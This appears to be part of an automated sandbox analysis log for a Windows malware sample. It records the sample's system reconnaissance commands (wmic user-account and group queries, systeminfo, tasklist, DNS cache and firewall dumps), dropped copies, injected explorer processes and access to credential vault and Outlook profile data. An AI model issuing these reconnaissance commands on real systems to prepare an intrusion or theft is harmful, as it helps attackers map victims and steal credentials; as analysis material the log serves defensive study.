Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
      Source: C:\Users\user\Desktop\bCnarg2O62.exe; Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\bCnarg2O62.exe; Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\bCnarg2O62.exe; Section loaded: msimg32.dll
      Source: C:\Users\user\Desktop\bCnarg2O62.exe; Section loaded: msvcr100.dll
      Source: C:\Windows\explorer.exe; Section loaded: taskschd.dll
      Source: C:\Windows\explorer.exe; Section loaded: webio.dll
      Source: C:\Users\user\AppData\Roaming\derhswe; Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Roaming\derhswe; Section loaded: winhttp.dll
      Source: C:\Users\user\AppData\Roaming\derhswe; Section loaded: msimg32.dll
      Source: C:\Users\user\AppData\Roaming\derhswe; Section loaded: msvcr100.dll
      Source: C:\Users\user\AppData\Roaming\derhswe; Section loaded: winhttp.dll
      Source: C:\Users\user\AppData\Roaming\derhswe; Section loaded: msimg32.dll
      Source: C:\Users\user\AppData\Roaming\derhswe; Section loaded: msvcr100.dll
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe; Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe; Section loaded: winhttp.dll
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe; Section loaded: msimg32.dll
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe; Section loaded: msvcr100.dll
      Source: C:\Users\user\AppData\Roaming\jfrhswe; Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Roaming\jfrhswe; Section loaded: winhttp.dll
      Source: C:\Users\user\AppData\Roaming\jfrhswe; Section loaded: msimg32.dll
      Source: C:\Users\user\AppData\Roaming\jfrhswe; Section loaded: msvcr100.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: ncrypt.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: winscard.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: winhttp.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: urlmon.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: devobj.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: iertutil.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: srvcli.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: ntasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: profapi.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: msasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: cryptnet.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: cryptsp.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: rsaenh.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: wbemcomn.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: amsi.dll
      Source: C:\Users\user\AppData\Local\Temp\9245.exe; Section loaded: userenv.dll
      Source: C:\Windows\System32\msiexec.exe; Section loaded: apphelp.dll
      Source: C:\Windows\System32\msiexec.exe; Section loaded: aclayers.dll
      Source: C:\Windows\System32\msiexec.exe; Section loaded: sfc.dll
      Source: C:\Windows\System32\msiexec.exe; Section loaded: sfc_os.dll
      Source: C:\Windows\System32\msiexec.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\msiexec.exe; Section loaded: msi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: aepic.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: twinapi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: iphlpapi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: powrprof.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: dxgi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: propsys.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: coremessaging.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: wtsapi32.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: wininet.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: dwmapi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: twinapi.appcore.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: ntmarta.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: wldp.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: umpdc.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: winhttp.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: vaultcli.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: wintypes.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: dpapi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: cryptbase.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: dhcpcsvc.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: webio.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: mswsock.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: winnsi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: dnsapi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: rasadhlp.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: fwpuclnt.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: schannel.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: mskeyprotect.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: ntasn1.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: ncrypt.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: ncryptsslp.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: rsaenh.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: gpapi.dll
      Source: C:\Windows\explorer.exe; Section loaded: aepic.dll
      Source: C:\Windows\explorer.exe; Section loaded: twinapi.dll
      Source: C:\Windows\explorer.exe; Section loaded: userenv.dll
      Source: C:\Windows\explorer.exe; Section loaded: iphlpapi.dll
      Source: C:\Windows\explorer.exe; Section loaded: powrprof.dll
      Source: C:\Windows\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\explorer.exe; Section loaded: dxgi.dll
      Source: C:\Windows\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\explorer.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\explorer.exe; Section loaded: propsys.dll
      Source: C:\Windows\explorer.exe; Section loaded: coremessaging.dll
      Source: C:\Windows\explorer.exe; Section loaded: urlmon.dll
      Source: C:\Windows\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\explorer.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\explorer.exe; Section loaded: wtsapi32.dll
      Source: C:\Windows\explorer.exe; Section loaded: wininet.dll
      Source: C:\Windows\explorer.exe; Section loaded: uxtheme.dll
      Source: C:\Windows\explorer.exe; Section loaded: dwmapi.dll
      Source: C:\Windows\explorer.exe; Section loaded: sspicli.dll
      Source: C:\Windows\explorer.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\explorer.exe; Section loaded: twinapi.appcore.dll
      Source: C:\Windows\explorer.exe; Section loaded: ntmarta.dll
      Source: C:\Windows\explorer.exe; Section loaded: cryptsp.dll
      Source: C:\Windows\explorer.exe; Section loaded: wldp.dll
      Source: C:\Windows\explorer.exe; Section loaded: iertutil.dll
      Source: C:\Windows\explorer.exe; Section loaded: srvcli.dll
      Source: C:\Windows\explorer.exe; Section loaded: netutils.dll
      Source: C:\Windows\explorer.exe; Section loaded: umpdc.dll
      Source: C:\Windows\explorer.exe; Section loaded: dnsapi.dll
      Source: C:\Windows\explorer.exe; Section loaded: winhttp.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: aepic.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: twinapi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: iphlpapi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: powrprof.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: dxgi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: propsys.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: coremessaging.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: wtsapi32.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: wininet.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: dwmapi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: twinapi.appcore.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: ntmarta.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: wldp.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: umpdc.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: dnsapi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: winhttp.dll
      Source: C:\Windows\System32\cmd.exe; Section loaded: winbrand.dll
      Source: C:\Windows\System32\cmd.exe; Section loaded: wldp.dll
      Source: C:\Windows\System32\wbem\WMIC.exe; Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exe; Section loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exe; Section loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exe; Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exe; Section loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exe; Section loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exe; Section loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exe; Section loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exe; Section loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exe; Section loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exe; Section loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exe; Section loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exe; Section loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exe; Section loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exe; Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: aepic.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: twinapi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: iphlpapi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: powrprof.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: ntmarta.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: dxgi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: propsys.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: coremessaging.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: wtsapi32.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: wininet.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: dwmapi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: twinapi.appcore.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: wldp.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: umpdc.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: dnsapi.dll
      Source: C:\Windows\SysWOW64\explorer.exe; Section loaded: winhttp.dll
      Source: C:\Windows\explorer.exe; Section loaded: aepic.dll
      Source: C:\Windows\explorer.exe; Section loaded: twinapi.dll
      Source: C:\Windows\explorer.exe; Section loaded: userenv.dll
      Source: C:\Windows\explorer.exe; Section loaded: iphlpapi.dll
      Source: C:\Windows\explorer.exe; Section loaded: powrprof.dll
      Source: C:\Windows\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\explorer.exe; Section loaded: dxgi.dll
      Source: C:\Windows\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\explorer.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\explorer.exe; Section loaded: propsys.dll
      Source: C:\Windows\explorer.exe; Section loaded: coremessaging.dll
      Source: C:\Windows\explorer.exe; Section loaded: urlmon.dll
      Source: C:\Windows\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\explorer.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\explorer.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\explorer.exe; Section loaded: wtsapi32.dll
      Source: C:\Windows\explorer.exe; Section loaded: wininet.dll
      Source: C:\Windows\explorer.exe; Section loaded: uxtheme.dll
      Source: C:\Windows\explorer.exe; Section loaded: dwmapi.dll
      Source: C:\Windows\explorer.exe; Section loaded: sspicli.dll
      Source: C:\Windows\explorer.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\explorer.exe; Section loaded: twinapi.appcore.dll
      Source: C:\Windows\explorer.exe; Section loaded: ntmarta.dll
      Source: C:\Windows\explorer.exe; Section loaded: cryptsp.dll
      Source: C:\Windows\explorer.exe; Section loaded: wldp.dll
      Source: C:\Windows\explorer.exe; Section loaded: iertutil.dll
      Source: C:\Windows\explorer.exe; Section loaded: srvcli.dll
      Source: C:\Windows\explorer.exe; Section loaded: netutils.dll
      Source: C:\Windows\explorer.exe; Section loaded: umpdc.dll
      Source: C:\Windows\explorer.exe; Section loaded: dnsapi.dll
      Source: C:\Windows\explorer.exe; Section loaded: winhttp.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll
      Source: C:\Windows\System32\ROUTE.EXE	Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dnsapi.dll
      Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
      Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
      Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
      Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
      Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
      Source: C:\Windows\explorer.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32
      Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
      Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
      Source: C:\Windows\SysWOW64\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
      Source: C:\Users\user\Desktop\bCnarg2O62.exe	File opened: C:\Windows\SysWOW64\msvcr100.dll
      Source: bCnarg2O62.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

      Data Obfuscation

      Source: C:\Users\user\Desktop\bCnarg2O62.exe	Unpacked PE file: 0.2.bCnarg2O62.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.siy:R;.fitecos:R;.darulet:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\derhswe	Unpacked PE file: 5.2.derhswe.400000.0.unpack .text:ER;.rdata:R;.data:W;.siy:R;.fitecos:R;.darulet:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\derhswe	Unpacked PE file: 6.2.derhswe.400000.0.unpack .text:ER;.rdata:R;.data:W;.siy:R;.fitecos:R;.darulet:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	Unpacked PE file: 7.2.1D0F.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xexolu:R;.naxurew:R;.havi:W;.rsrc:R; vs .text:EW;
